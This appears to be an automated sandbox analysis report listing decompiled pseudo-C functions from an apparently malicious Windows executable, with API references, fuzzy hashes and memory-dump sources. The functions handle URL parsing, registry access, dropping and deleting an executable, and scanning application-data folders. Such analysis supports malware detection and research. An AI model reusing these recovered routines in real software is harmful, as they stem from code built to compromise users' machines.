    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: freeaddrinfogetaddrinfogetsocknamerecvselectsend
    • String ID: Z
    • API String ID: 2962621997-1505515367
    • Opcode ID: fc6f540948a9d1a067198b6e438f5e8d25525fc32e1956a21b593c0f6b6ed1cb
    • Instruction ID: fd58340973e5d0e21fa197a060c7f8e3f1e8f88e23ba452a615d9853c28125ca
    • Opcode Fuzzy Hash: fc6f540948a9d1a067198b6e438f5e8d25525fc32e1956a21b593c0f6b6ed1cb
    • Instruction Fuzzy Hash: 3B81E6722083404AD720DA25D841BEBB7E4ABC5354F044A3EF995A72C2D67CDE4DC79B
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0041FDC0(WCHAR* __ecx, void* __edx, WCHAR** _a4) {
    				short _v524;
    				char _v532;
    				char _v636;
    				char _v664;
    				char _v684;
    				char _v688;
    				WCHAR* _v696;
    				char _v700;
    				char _v704;
    				char _v708;
    				intOrPtr* _v712;
    				WCHAR* _v716;
    				intOrPtr* _v724;
    				char _v728;
    				WCHAR* _v732;
    				intOrPtr _v736;
    				char _v740;
    				void* __ebx;
    				void* __esi;
    				WCHAR* _t47;
    				WCHAR* _t49;
    				WCHAR* _t53;
    				intOrPtr* _t56;
    				WCHAR* _t57;
    				intOrPtr* _t58;
    				WCHAR* _t63;
    				intOrPtr* _t65;
    				WCHAR* _t67;
    				intOrPtr* _t69;
    				WCHAR* _t71;
    				WCHAR* _t74;
    				WCHAR* _t75;
    				WCHAR* _t80;
    				WCHAR* _t84;
    				WCHAR* _t87;
    				signed int _t96;
    				signed int _t98;
    				WCHAR* _t99;
    				WCHAR* _t100;
    				intOrPtr _t101;
    				WCHAR* _t102;
    				WCHAR* _t115;
    				WCHAR* _t132;
    				signed int _t136;
    				WCHAR* _t139;
    				WCHAR* _t140;
    				WCHAR* _t146;
    				char* _t147;
    				char* _t148;
    				WCHAR* _t150;
    
    				_t102 = __ecx;
    				_push(_t96);
    				_t47 = __edx + 0x2c;
    				if(_t47 != 0) {
    					while(1) {
    						_t136 =  *_t47 & 0x0000ffff;
    						if(_t136 != 0x5c && _t136 != 0x2f) {
    							goto L4;
    						}
    						_t47 =  &(_t47[1]);
    					}
    				}
    				L4:
    				_t49 = PathCombineW( &_v524, _t102, _t47);
    				__eflags = _t49;
    				if(_t49 != 0) {
    					_push( &_v532);
    					_t139 = E00419940();
    					_v696 = _t139;
    					__eflags = _t139;
    					if(_t139 != 0) {
    						_t53 =  *((intOrPtr*)( *((intOrPtr*)( *_t139 + 0xb4))))(_t139,  &_v696);
    						__eflags = _t53;
    						if(_t53 == 0) {
    							_t56 = _v704;
    							_t125 =  *( *_t56 + 0x1c);
    							_t57 =  *( *( *_t56 + 0x1c))(_t56,  &_v708);
    							__eflags = _t57;
    							if(_t57 == 0) {
    								_t11 =  &(_t57[0x23]); // 0x47
    								E00424100(_t11,  &_v684);
    								_t146 = _v716;
    								_t63 = E00411BF0((_t125 | 0xffffffff) + 0xf, _t146, _t125 | 0xffffffff,  &_v684);
    								__eflags = _t63;
    								_t98 = _t96 & 0xffffff00 | _t63 == 0x00000000;
    								__eflags = _t146;
    								if(_t146 != 0) {
    									__imp__#6(_t146);
    								}
    								__eflags = _t98;
    								if(_t98 != 0) {
    									_t147 =  &_v684;
    									_v716 = 0;
    									E00424100(0x48, _t147);
    									_t65 = _v712;
    									_t67 =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0x94))))(_t65, _t147,  &_v688);
    									__eflags = _t67;
    									if(_t67 != 0) {
    										_t99 = 0;
    										__eflags = 0;
    									} else {
    										_t99 = E004199F0( &_v700);
    									}
    									_t148 =  &_v664;
    									E00424100(0x49, _t148);
    									_t69 = _v724;
    									_t71 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0x94))))(_t69, _t148,  &_v704);
    									__eflags = _t71;
    									if(_t71 != 0) {
    										_t140 = 0;
    										__eflags = 0;
    									} else {
    										_t140 = E004199F0( &_v716);
    									}
    									E00424100(0x4a,  &_v636);
    									_t132 = 0x4032e8;
    									__eflags = _t140;
    									if(_t140 != 0) {
    										_t132 = _t140;
    									}
    									_t115 = 0x4032e8;
    									__eflags = _t99;
    									if(_t99 != 0) {
    										_t115 = _t99;
    									}
    									_t74 =  *_a4;
    									__eflags = _t74;
    									if(__eflags == 0) {
    										L23:
    										_t75 = 0x4032e8;
    									} else {
    										__eflags =  *_t74;
    										_t75 = 0x403964;
    										if(__eflags == 0) {
    											goto L23;
    										}
    									}
    									_push(_t132);
    									_push(_t115);
    									_t30 =  &_v740; // 0x4032e8
    									_t150 = E00411DC0(__eflags, _t30,  &_v636, _t75);
    									__eflags = _t99;
    									if(_t99 != 0) {
    										__imp__#6(_t99);
    									}
    									__eflags = _t140;
    									if(_t140 != 0) {
    										__imp__#6(_t140);
    									}
    									__eflags = _t150;
    									if(_t150 > 0) {
    										_t100 = 0;
    										E00424100(0x53,  &_v728);
    										_t142 =  &(_a4[1]);
    										_t80 = E0041FB50(_v736, __eflags,  &_v728,  &(_a4[1]),  &_v740);
    										__eflags = _t80;
    										if(_t80 != 0) {
    											_t100 = 1;
    										}
    										E00424100(0x52,  &_v728);
    										_t84 = E0041FB50(_v736, __eflags,  &_v728, _t142,  &_v740);
    										__eflags = _t84;
    										if(_t84 != 0) {
    											_t100 =  &(_t100[0]);
    											__eflags = _t100;
    										}
    										E00424100(0x51,  &_v728);
    										_t87 = E0041FB50(_v736, __eflags,  &_v728, _t142,  &_v740);
    										__eflags = _t87;
    										if(_t87 != 0) {
    											_t100 =  &(_t100[0]);
    											__eflags = _t100;
    										}
    										__eflags = _t100;
    										_t101 = _v740;
    										if(_t100 != 0) {
    											E00410D70(_a4, _t101, 0xffffffff);
    										}
    										E004107C0(_t101);
    									}
    									_t139 = _v732;
    								}
    							}
    							_t58 = _v712;
    							 *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))(_t58);
    						}
    						 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))(_t139);
    					}
    				}
    				return 1;
    			}






















































    APIs
    • PathCombineW.SHLWAPI(?,?,?), ref: 0041FDF2
    • SysFreeString.OLEAUT32(?), ref: 0041FE76
    • SysFreeString.OLEAUT32(00000000), ref: 0041FF58
    • SysFreeString.OLEAUT32(00000000), ref: 0041FF63
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeString$CombinePath
    • String ID: 2@2@2@
    • API String ID: 16530377-2859081985
    • Opcode ID: 923ba26d1f45aeedad86daf020485d0242938c5e8364e901f2dc438b450f2b64
    • Instruction ID: ebc132c2068c1742c74e001bb4f87a602cae578e09e7994492e26e7f82f4237e
    • Opcode Fuzzy Hash: 923ba26d1f45aeedad86daf020485d0242938c5e8364e901f2dc438b450f2b64
    • Instruction Fuzzy Hash: 4861D1723042129BD710DF25D880AABB3E9AFC5744F04452EF94597351DB38ED4BCBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E004117A0(signed int __eax, long __ecx, void** _a4) {
    				long _v4;
    				long _v8;
    				signed int _t29;
    				signed int _t30;
    				void* _t32;
    				signed int _t33;
    				signed int _t34;
    				void* _t35;
    				signed int _t38;
    				signed int _t43;
    				long _t44;
    				long _t46;
    				long _t49;
    				void** _t52;
    				signed int _t58;
    				void* _t59;
    				void* _t60;
    				long _t61;
    				long _t62;
    				void* _t64;
    
    				_t52 = _a4;
    				_t61 = __ecx;
    				_t64 = __ecx + __eax * 2;
    				_v8 = 0;
    				 *_t52 = 0;
    				_t46 = 8;
    				while(1) {
    					_v4 = _t46;
    					if(_t61 >= _t64) {
    						break;
    					} else {
    						goto L3;
    					}
    					while(1) {
    						L3:
    						_t29 =  *_t61 & 0x0000ffff;
    						if(_t29 != 0x20 && (_t29 < 9 || _t29 > 0xd)) {
    							break;
    						}
    						_t61 = _t61 + 2;
    						if(_t61 < _t64) {
    							continue;
    						} else {
    							goto L7;
    						}
    						L55:
    					}
    					__eflags = _t61 - _t64;
    					if(_t61 >= _t64) {
    						break;
    					} else {
    						_t30 =  *_t61 & 0x0000ffff;
    						_t44 = _t61 + 2;
    						__eflags = _t30 - 0x27;
    						if(_t30 == 0x27) {
    							L18:
    							_t61 = _t44;
    							__eflags = _t44 - _t64;
    							if(__eflags < 0) {
    								while(1) {
    									__eflags =  *_t44 - _t30;
    									if( *_t44 == _t30) {
    										break;
    									}
    									_t44 = _t44 + 2;
    									__eflags = _t44 - _t64;
    									if(_t44 < _t64) {
    										continue;
    									}
    									break;
    								}
    								__eflags = _t44 - _t64;
    							}
    							if(__eflags == 0) {
    								_t61 = _t61 - 2;
    								__eflags = _t61;
    							}
    						} else {
    							__eflags = _t30 - 0x22;
    							if(_t30 == 0x22) {
    								goto L18;
    							} else {
    								__eflags = _t44 - _t64;
    								if(_t44 < _t64) {
    									while(1) {
    										_t43 =  *_t44 & 0x0000ffff;
    										__eflags = _t43 - 0x20;
    										if(_t43 == 0x20) {
    											goto L24;
    										}
    										__eflags = _t43 - 9;
    										if(_t43 < 9) {
    											L16:
    											_t44 = _t44 + 2;
    											__eflags = _t44 - _t64;
    											if(_t44 < _t64) {
    												continue;
    											} else {
    											}
    										} else {
    											__eflags = _t43 - 0xd;
    											if(_t43 > 0xd) {
    												goto L16;
    											}
    										}
    										goto L24;
    									}
    								}
    							}
    						}
    						L24:
    						_t8 = _t46 - 4; // 0x4
    						_t58 = _t44 - _t61 >> 1;
    						__eflags = _t8;
    						_t32 =  *_t52;
    						if(_t8 != 0) {
    							_push(_t46);
    							__eflags = _t32;
    							if(_t32 != 0) {
    								_t33 = HeapReAlloc( *0x42e6d4, 8, _t32, ??);
    							} else {
    								_t33 = HeapAlloc( *0x42e6d4, 8, ??);
    							}
    							__eflags = _t33;
    							if(_t33 == 0) {
    								goto L48;
    							} else {
    								 *_a4 = _t33;
    								goto L33;
    							}
    						} else {
    							__eflags = _t32;
    							if(_t32 != 0) {
    								HeapFree( *0x42e6d4, 0, _t32);
    							}
    							 *_a4 = 0;
    							L33:
    							__eflags = _t58;
    							if(_t58 != 0) {
    								_t38 = _t58;
    								__eflags = _t61;
    								if(_t61 != 0) {
    									__eflags = _t58 - 0xffffffff;
    									if(_t58 == 0xffffffff) {
    										_t38 = 0;
    										__eflags =  *_t61;
    										if( *_t61 != 0) {
    											do {
    												_t38 = _t38 + 1;
    												__eflags =  *((short*)(_t61 + _t38 * 2));
    											} while ( *((short*)(_t61 + _t38 * 2)) != 0);
    										}
    									}
    									_t60 = _t38 + _t38;
    									_t33 = _t60 + 2;
    									__eflags = _t33;
    									if(_t33 != 0) {
    										_t33 = HeapAlloc( *0x42e6d4, 8, _t33 + 4);
    										__eflags = _t33;
    										if(_t33 != 0) {
    											_push(_t60);
    											_push(_t61);
    											goto L45;
    										}
    									}
    								} else {
    									_t33 = 0;
    								}
    							} else {
    								_t33 = HeapAlloc( *0x42e6d4, 8, 8);
    								__eflags = _t33;
    								if(_t33 != 0) {
    									_push(2);
    									_push(0x4032e8);
    									L45:
    									_push(_t33);
    									_t33 = E00410820();
    								}
    							}
    							_t52 = _a4;
    							_t49 = _v4;
    							 *(_t49 +  *_t52 - 8) = _t33;
    							__eflags = _t33;
    							if(_t33 == 0) {
    								L48:
    								_t59 =  *_a4;
    								_t62 = _v8;
    								__eflags = _t59;
    								if(_t59 != 0) {
    									__eflags = _t62;
    									if(_t62 != 0) {
    										do {
    											_t35 =  *(_t59 + _t62 * 4 - 4);
    											_t62 = _t62 - 1;
    											__eflags = _t35;
    											if(_t35 != 0) {
    												HeapFree( *0x42e6d4, 0, _t35);
    											}
    											__eflags = _t62;
    										} while (_t62 != 0);
    										_t33 = HeapFree( *0x42e6d4, _t62, _t59);
    									}
    								}
    								_t34 = _t33 | 0xffffffff;
    								__eflags = _t34;
    								return _t34;
    							} else {
    								_v8 = _v8 + 1;
    								_t46 = _t49 + 4;
    								_t61 = _t44 + 2;
    								continue;
    							}
    						}
    					}
    					goto L55;
    				}
    				L7:
    				return _v8;
    				goto L55;
    			}

    APIs
    • HeapFree.KERNEL32(?,00000000,00000004), ref: 00411861
    • HeapAlloc.KERNEL32(?,00000008,00000008), ref: 00411880
    • HeapReAlloc.KERNEL32(?,00000008,00000004,00000008), ref: 00411892
    • HeapAlloc.KERNEL32(?,00000008,00000008), ref: 004118B4
    • HeapAlloc.KERNEL32(?,00000008,?), ref: 004118FF
    • HeapFree.KERNEL32(?,00000000,?), ref: 00411956
    • HeapFree.KERNEL32(?,-00000001,?), ref: 00411969
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Alloc$Free
    • String ID:
    • API String ID: 1549400367-0
    • Opcode ID: f60de8f0293e2eeba401ae24e18fa927648111e7f0ba04294d2490ef573b5cf3
    • Instruction ID: 9dc50fb28a03401c9ee00c604aadc78a0ced638830a0e4b606b1ffdf3536ed6e
    • Opcode Fuzzy Hash: f60de8f0293e2eeba401ae24e18fa927648111e7f0ba04294d2490ef573b5cf3
    • Instruction Fuzzy Hash: 1D5116B16002119BCB34AF15DD80BABB3A4EB51710F54892BEA51E73A0D738DCC5C7AE
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004173A0(void** __eax, char* __edx) {
    				void* _v16;
    				intOrPtr _v20;
    				void* _v24;
    				intOrPtr _v28;
    				char* _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _v52;
    				char _v60;
    				void* _v68;
    				void* _v72;
    				void* _v76;
    				intOrPtr _v88;
    				intOrPtr* _t45;
    				void* _t46;
    				long _t49;
    				long _t55;
    				void* _t57;
    				intOrPtr _t74;
    				void* _t80;
    				void* _t88;
    				void* _t90;
    				void** _t94;
    				void* _t95;
    				intOrPtr* _t97;
    
    				_t94 = __eax;
    				E00410870( &_v60,  &_v60, 0, 0x3c);
    				_v72 = 0x3c;
    				_v52 = 1;
    				_v24 = 1;
    				_v16 = 1;
    				if(InternetCrackUrlA(__edx, 0, 0,  &_v72) != 0) {
    					E00410870(_t43, _t94, 0, 0x10);
    					_t45 = _v72;
    					_t88 = _v68;
    					_t97 = _t45;
    					if(_t45 != 0) {
    						if(_t88 == 0xffffffff) {
    							_t80 = 0;
    							if( *_t45 != 0) {
    								do {
    									_t80 = _t80 + 1;
    								} while ( *((char*)(_t80 + _t45)) != 0);
    							}
    							_t88 = _t80;
    						}
    						_t10 = _t88 + 1; // 0x1
    						_t46 = _t10;
    						if(_t46 != 0) {
    							_t46 = HeapAlloc( *0x42e6d4, 8, _t46 + 4);
    							if(_t46 != 0) {
    								_t46 = E00410820(_t46, _t97, _t88);
    							}
    						}
    					} else {
    						_t46 = 0;
    					}
    					 *_t94 = _t46;
    					if(_t46 == 0) {
    						L20:
    						return 0;
    					} else {
    						_t74 = _v28;
    						if(_t74 != 0) {
    							while( *_v32 == 0x2f) {
    								_v32 = _v32 + 1;
    								_t74 = _t74 - 1;
    								_v28 = _t74;
    								if(_t74 != 0) {
    									continue;
    								}
    								goto L15;
    							}
    						}
    						L15:
    						_t90 = _v20 + _t74 + 1;
    						_t49 = _t90 + 1;
    						if(_t49 != 0) {
    							_t49 = HeapAlloc( *0x42e6d4, 8, _t49 + 4);
    							_t74 = _v28;
    						}
    						_t94[1] = _t49;
    						if(_t49 != 0) {
    							E00410820(_t49 + 1, _v32, _t74);
    							E00410820(_t94[1] + _v40 + 1, _v36, _v32);
    							_t55 = _t94[1];
    							 *_t55 = 0x2f;
    							 *((char*)(_t55 + _t90)) = 0;
    							_t57 = _v88 - 3;
    							_t94[2] = _v52 + 1;
    							_t94[3] = _v76;
    							if(_t57 == 0) {
    								_t94[3] = 1;
    								return 1;
    							} else {
    								if(_t57 == 1) {
    									_t94[3] = 2;
    									return 1;
    								} else {
    									_t94[3] = 0;
    									return 1;
    								}
    							}
    						} else {
    							_t95 =  *_t94;
    							if(_t95 != 0) {
    								HeapFree( *0x42e6d4, _t49, _t95);
    							}
    							goto L20;
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7
    • HeapAlloc.KERNEL32(?,00000008,?,?,00000000,00000010,?,?,?,?,00000000,00000000), ref: 00417482
    • HeapFree.KERNEL32(?,?,?,?,00000000,00000010,?,?,?,?,00000000,00000000), ref: 0041749E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$AllocCrackFreeInternet
    • String ID: <
    • API String ID: 2876332909-4251816714
    • Opcode ID: cc5f9a8f36f33dbca9e3e72d9ceb5da9caec099972d3217e19cf766685f9f917
    • Instruction ID: 9633b5bfb83e068e29b07d6222b12203e759bdc0c62843f133f9147008ba2725
    • Opcode Fuzzy Hash: cc5f9a8f36f33dbca9e3e72d9ceb5da9caec099972d3217e19cf766685f9f917
    • Instruction Fuzzy Hash: 7351F4316083419BD720CB29D880BA7BBF8AF85314F44442EF985C7341D736E981CBA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 53%
    			E0041F4B0() {
    				char _v696;
    				char _v1008;
    				long _v1024;
    				intOrPtr* _v1044;
    				int _v1048;
    				char _v1052;
    				int _v1064;
    				char _v1080;
    				intOrPtr* _v1084;
    				char _v1088;
    				char _v1096;
    				void* __esi;
    				int _t24;
    				int _t33;
    				intOrPtr* _t36;
    				intOrPtr* _t48;
    				void* _t58;
    				intOrPtr* _t59;
    				void* _t61;
    				intOrPtr* _t62;
    				void* _t63;
    				intOrPtr* _t65;
    
    				_t59 = __imp__CoCreateInstance;
    				_v1024 = 0;
    				_t24 =  *_t59(0x403944, 0, 0x4401, 0x403954,  &_v1024, _t58, _t63);
    				if(_t24 != 0) {
    					L12:
    					return _t24;
    				}
    				_t65 = _v1044;
    				if(_t65 == 0) {
    					goto L12;
    				}
    				_push(_t24);
    				_v1048 = _t24;
    				_push(_t24);
    				_push(_t65);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0xc))))() != 0) {
    					L8:
    					_t43 =  *( *_t65 + 8);
    					 *( *( *_t65 + 8))(_t65);
    					_t24 = _v1064;
    					_t61 = _t24;
    					if(_t24 != 0) {
    						if( *_t24 != 0) {
    							asm("sbb ecx, ecx");
    							E00424100( ~_t43 + 0x3c,  &_v696);
    							E0040D880(_t61, 0xcc,  &_v696);
    						}
    						_t24 = HeapFree( *0x42e6d4, 0, _t61);
    					}
    					goto L12;
    				}
    				_t7 =  &_v1052; // 0x403954
    				_t33 =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0x14))))(_t65, 2, 0, _t7);
    				if(_t33 != 0) {
    					goto L8;
    				}
    				_v1064 = _t33;
    				_push( &_v1064);
    				_push(0x403924);
    				_push(0x4401);
    				_push(0);
    				_push(0x403914);
    				if( *_t59() == 0) {
    					_t48 = _v1084;
    					if(_t48 != 0) {
    						_t62 = _t48;
    						_v1080 = 0x44;
    						_v1008 = 0x118;
    						E0041F230(_t48, _t65, _v1088,  &_v1080);
    						 *((intOrPtr*)( *((intOrPtr*)( *_t62 + 8))))(_t62,  &_v1008,  &_v1096);
    					}
    				}
    				_t18 =  &_v1088; // 0x403954
    				_t36 =  *_t18;
    				 *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))(_t36);
    				goto L8;
    			}

    APIs
    • CoCreateInstance.OLE32 ref: 0041F4E2
    • CoCreateInstance.OLE32(00403914,00000000,00004401,00403924,00004401), ref: 0041F539
    • HeapFree.KERNEL32(?,00000000,?), ref: 0041F5D2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateInstance$FreeHeap
    • String ID: D$T9@
    • API String ID: 2709810982-1475115963
    • Opcode ID: a43a38136b82de879791f632eebdeacccadc94f65f88175787f179a4a3c2c8c0
    • Instruction ID: 7a6da8828539e897b71298a9f600d4cbc73281b2688f0174425e4c7ab50b50d8
    • Opcode Fuzzy Hash: a43a38136b82de879791f632eebdeacccadc94f65f88175787f179a4a3c2c8c0
    • Instruction Fuzzy Hash: 56318071204301ABD714DF19CC45FABB7E9ABC8704F10852DF64897290DB74ED46CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00423B70(signed char _a4) {
    				void* _v0;
    				short _v520;
    				intOrPtr _v524;
    				void* _v528;
    				void* _v556;
    				void* _v564;
    				char _v572;
    				char _v573;
    				void* _v577;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t22;
    				void* _t39;
    				WCHAR* _t47;
    				void* _t48;
    				void* _t50;
    				void* _t51;
    
    				_v573 = 0;
    				_t50 = E00423A90();
    				_t52 = _t50;
    				if(_t50 == 0) {
    					return 0;
    				} else {
    					_t48 = _t50;
    					if(E00418CD0(_t52,  &_v572) != 0) {
    						_t22 = _v572;
    						if(_t22 > 0x2020000 || _a4 == 1 && _t22 >= 0x2020000) {
    							if(E00418BD0(0x4e22, 0x10000000, _t48) != 0) {
    								_t39 = E00418C20(_t23);
    								if(_t39 != 0) {
    									_t47 =  &_v520;
    									if(E004181D0(_t47, ?str?) != 0) {
    										_t49 = _t51 + 0x18;
    										E0041CC70(_t51 + 0x18);
    										 *((intOrPtr*)(_t51 + 0x24)) =  *0x42edbc;
    										 *(_t51 + 0x2c) = _t39;
    										_v524 = _t47;
    										if(E004133B0(_t49, 0) != 0) {
    											asm("sbb eax, eax");
    											if(E00412BF0( ~(_a4 & 0x000000ff) & 0x00403984, _t47, 0, 0, 0) != 0) {
    												_v573 = 1;
    											}
    										}
    										SetFileAttributesW( &_v520, 0x80);
    										DeleteFileW( &_v520);
    									}
    									HeapFree( *0x42e6d4, 0, _t39);
    								}
    							}
    						}
    					}
    					HeapFree( *0x42e6d4, 0, _t50);
    					return _v573;
    				}
    			}

    APIs
      • Part of subcall function 00423A90: RegOpenKeyExW.ADVAPI32(80000001), ref: 00423AD6
      • Part of subcall function 00423A90: HeapFree.KERNEL32(?,00000000,?,00000001,?), ref: 00423B17
    • SetFileAttributesW.KERNEL32(?,00000080,00000000,exe,?,10000000,?,?,00000001), ref: 00423C5C
    • DeleteFileW.KERNEL32(?), ref: 00423C67
    • HeapFree.KERNEL32(?,00000000,00000000,exe,?,10000000,?,?,00000001), ref: 00423C77
    • HeapFree.KERNEL32(?,00000000,00000000,?,10000000,?,?,00000001), ref: 00423C86
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeap$File$AttributesDeleteOpen
    • String ID: exe
    • API String ID: 1836167533-1801697008
    • Opcode ID: aeb44346a91935ba3ead5d5845104ac06464093365e5f8813fedc1d9daa53d3b
    • Instruction ID: 55b7f55bf01f0243d781b9387340562a74aa303d5ec605879d63c545876d9078
    • Opcode Fuzzy Hash: aeb44346a91935ba3ead5d5845104ac06464093365e5f8813fedc1d9daa53d3b
    • Instruction Fuzzy Hash: 3C313A323043501AD3209F26AD49BABB7A99B85345F84083FBE80AB291DA7DD949C75D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041D210(signed int __ebx, WCHAR* __edi) {
    				char _v668;
    				char _v796;
    				char _v1056;
    				char _v1106;
    				char _v1126;
    				char _v1146;
    				char _v1556;
    				short _v1644;
    				WCHAR* __esi;
    				short _t22;
    				signed int _t25;
    				WCHAR* _t34;
    				short* _t40;
    
    				_t34 = __edi;
    				_t25 = __ebx;
    				_t40 =  &_v1644;
    				 *__edi = 0;
    				E0041D150( &_v796);
    				_t31 =  &_v1056;
    				E00410820( &_v1056,  &_v668, 0x102);
    				_t22 = E00412640(_t31, E00410820( &_v1556, 0x42eb80, 0x1e6), 0x1e6);
    				if(__ebx > 3) {
    					L20:
    					return _t22;
    				} else {
    					switch( *((intOrPtr*)(__ebx * 4 +  &M0041D324))) {
    						case 0:
    							__esi = 0x42e958;
    							__eax =  &_v1126;
    							goto L5;
    						case 1:
    							_t23 =  &_v1146;
    							goto L5;
    						case 2:
    							__esi = L"SOFTWARE\\Microsoft";
    							__eax =  &_v1106;
    							L5:
    							_t28 = 0;
    							if(_t23 != 0 &&  *_t23 != 0) {
    								do {
    									_t28 = _t28 + 1;
    								} while (_t23[_t28] != 0);
    							}
    							_t22 = MultiByteToWideChar(0, 0, _t23, _t28,  &_v1644, 0x32);
    							if(_t22 >= 0x32) {
    								_t22 = 0;
    							}
    							 *((short*)(_t40 + 4 + _t22 * 2)) = 0;
    							if(_t22 == 0) {
    								goto L20;
    							} else {
    								_t30 =  &_v1644;
    								while(1) {
    									_t24 =  *_t30 & 0x0000ffff;
    									if(_t24 != 0x5c && _t24 != 0x2f) {
    										break;
    									}
    									_t30 =  &(_t30[1]);
    								}
    								_t22 = PathCombineW(_t34, 0x42e958, _t30);
    								if(_t22 != 0) {
    									if(_t25 == 0) {
    										_t22 = PathRenameExtensionW(_t34, L".dat");
    										if(_t22 == 0) {
    											 *_t34 = _t22;
    										}
    									}
    									goto L20;
    								} else {
    									 *_t34 = 0;
    									return _t22;
    								}
    							}
    							goto L21;
    					}
    				}
    				L21:
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000102,00000032,00000000,000001E6,?,0042EB80,000001E6,?,?,00000102,00000000), ref: 0041D2BB
    • PathCombineW.SHLWAPI(?,0042E958,?), ref: 0041D2EC
    • PathRenameExtensionW.SHLWAPI(?,.dat), ref: 0041D30D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$ByteCharCombineExtensionMultiRenameWide
    • String ID: .dat$SOFTWARE\Microsoft
    • API String ID: 3133001891-47915998
    • Opcode ID: 7ecb7d4943af6973b06284ae6a97bbfde9274b8705e4f6f5ce95a3ba96ab3934
    • Instruction ID: df229da979e20e8d115c7300bb258489577514de700eb6c184516c4853c9e617
    • Opcode Fuzzy Hash: 7ecb7d4943af6973b06284ae6a97bbfde9274b8705e4f6f5ce95a3ba96ab3934
    • Instruction Fuzzy Hash: 8A2105B0A0825156E724DB21DC86BFB33A89F81700F40487FF895D6190E37CD9C2825F
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 64%
    			E00422650(void* __eflags) {
    				char _v680;
    				char _v1180;
    				char _v1200;
    				char _v1212;
    				intOrPtr _v1216;
    				intOrPtr _v1220;
    				intOrPtr _v1224;
    				intOrPtr _v1228;
    				char _v1236;
    				char _v1248;
    				intOrPtr _v1252;
    				void* _v1256;
    				void* __esi;
    				void* _t22;
    				intOrPtr* _t39;
    				void* _t40;
    				char* _t41;
    				signed int _t42;
    				void* _t44;
    
    				_t44 =  &_v1236;
    				_t41 =  &_v1212;
    				E00424100(0x95, _t41);
    				_v1224 = 0x26;
    				_v1220 = 0x1a;
    				_v1216 = 0x23;
    				_v1228 = _t41;
    				E00410870(_t41,  &_v1236, 0, 8);
    				_t39 = __imp__SHGetFolderPathW;
    				_t42 = 0;
    				do {
    					_push( &_v1180);
    					_push(0);
    					_push(0);
    					_push( *((intOrPtr*)(_t44 + 0x14 + _t42 * 4)));
    					_push(0);
    					if( *_t39() == 0) {
    						E00418700( &_v1200,  &_v1248, 1, 2, E00422370,  &_v1256, _t21, _t21, _t21);
    					}
    					_t42 = _t42 + 1;
    				} while (_t42 < 3);
    				_t22 = _v1256;
    				if(_v1252 <= 0) {
    					if(_t22 != 0) {
    						return HeapFree( *0x42e6d4, 0, _t22);
    					}
    					goto L11;
    				} else {
    					_t40 = _t22;
    					if(_t22 == 0) {
    						L11:
    						return _t22;
    					} else {
    						if( *_t22 != 0) {
    							E00424100(0x96,  &_v680);
    							E0040D880(_t40, 0xcb,  &_v680);
    						}
    						return HeapFree( *0x42e6d4, 0, _t40);
    					}
    				}
    			}

    APIs
    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 004226B0
